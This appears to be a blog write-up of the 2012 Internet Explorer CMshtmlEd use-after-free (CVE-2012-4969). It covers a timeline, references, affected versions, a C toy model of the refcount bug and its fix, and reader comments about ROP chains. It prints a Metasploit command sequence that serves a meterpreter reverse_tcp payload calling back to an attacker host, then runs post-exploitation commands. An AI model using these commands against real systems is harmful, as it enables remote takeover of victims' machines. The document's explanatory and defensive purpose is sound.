Timeline:
Vulnerability found exploited in the wild and discovered by Eric Romang
First details of the vulnerability on 2012-09-14
Advanced details of the vulnerability provided by binjo on 2012-09-16
Metasploit PoC provided on 2012-09-17
PoC provided by:
unknown
eromang
binjo
sinn3r
juan vazquez
Reference(s):
OSVDB-85532
Vulnhunt.com
eromang blog
Metasploit
CVE-2012-4969
MSA-2757760
MS12-063
Affected version(s):
IE 7 on Windows XP SP3
IE 8 on Windows XP SP3
IE 7 on Windows Vista
IE 8 on Windows Vista
IE 8 on Windows 7
IE 9 on Windows 7
Tested on Windows XP Pro SP3 with:
Internet Explorer 8
Description:
This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.
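The description above boils down to a reference-counting mistake: a raw pointer to a COM-style object is kept while code runs that can release the last reference, and the pointer is then used in Exec(). The following C program is an added illustration of that pattern and of the fix (holding a reference across the dangerous call); it is a toy model written for this page, not Microsoft's code or the Metasploit module, and the object, field and function names (Obj, Document, obj_exec, script_callback_drops_editor) are invented. To keep the demo well-defined, release() flips an `alive` flag instead of calling free(), so the stale use is reported as -1 rather than being undefined behaviour (in real code a sanitizer or the crash plays that role).

```c
#include <stdio.h>
#include <stdlib.h>

/* Toy model of a reference-counted object with a vtable-like function
 * pointer (constructed for this example). release() never frees: it clears
 * 'alive' so a use-after-release is observable instead of undefined. */
typedef struct Obj {
    long refcount;
    int alive;
    int (*exec)(struct Obj *self, int cmd);
} Obj;

static int obj_exec_impl(Obj *self, int cmd) { (void)self; return cmd + 1; }

static Obj *obj_create(void) {
    Obj *o = calloc(1, sizeof *o);
    if (!o) abort();
    o->refcount = 1;          /* creator holds the first reference */
    o->alive = 1;
    o->exec = obj_exec_impl;
    return o;
}

static void obj_addref(Obj *o) { o->refcount++; }

static void obj_release(Obj *o) {
    if (--o->refcount == 0) o->alive = 0;   /* real code would free(o) here */
}

/* Checked dispatch: a dead object yields -1 instead of a call through
 * whatever now occupies the freed memory. */
static int obj_exec(Obj *o, int cmd) {
    if (!o->alive) return -1;
    return o->exec(o, cmd);
}

/* A document owning one editor object. Script running during rendering
 * may drop the document's reference at any point. */
typedef struct { Obj *editor; } Document;

static void script_callback_drops_editor(Document *doc) {
    obj_release(doc->editor);
    doc->editor = NULL;
}

/* Vulnerable pattern: cache a raw pointer, run code that can delete the
 * object, then dispatch through the stale pointer. Returns -1. */
int exec_unguarded(void) {
    Document doc = { obj_create() };
    Obj *ed = doc.editor;               /* no reference taken */
    script_callback_drops_editor(&doc); /* refcount 1 -> 0: object is gone */
    int r = obj_exec(ed, 41);           /* use-after-free in a real engine */
    free(ed);                           /* cleanup of the toy allocation only */
    return r;
}

/* Fixed pattern: own a reference for as long as the pointer is used. Returns 42. */
int exec_guarded(void) {
    Document doc = { obj_create() };
    Obj *ed = doc.editor;
    obj_addref(ed);                     /* refcount 2 */
    script_callback_drops_editor(&doc); /* refcount 2 -> 1: still alive */
    int r = obj_exec(ed, 41);
    obj_release(ed);                    /* refcount 1 -> 0 */
    free(ed);
    return r;
}

int main(void) {
    printf("unguarded: %d\n", exec_unguarded());
    printf("guarded:   %d\n", exec_guarded());
    return 0;
}
```

The guarded variant is the shape of the actual fix class for this bug family: whoever caches a pointer to a refcounted object across code that can run arbitrary script must AddRef it first and Release it afterwards, which is what MS12-063 style patches enforce in the engine.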
Commands:
use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit
sysinfo
getuid
I have tried using this JRE ROP after installing JRE version 1.5.0.50 on a Windows 7 machine. However, the exploit does not seem to be working for me. Please note I have used some wild samples, not the PoC. This address 0x7c37653d appears to be unknown. Getting an access violation. Could someone tell me what I am doing wrong here?
Fail Internet Explorer 😀 excellent
hi,
I wonder why the console says "using msvcrt ROP"; when I tried it, it says "using JRE ROP"?
thx
klaus
Fantastic. By Brazil 🙂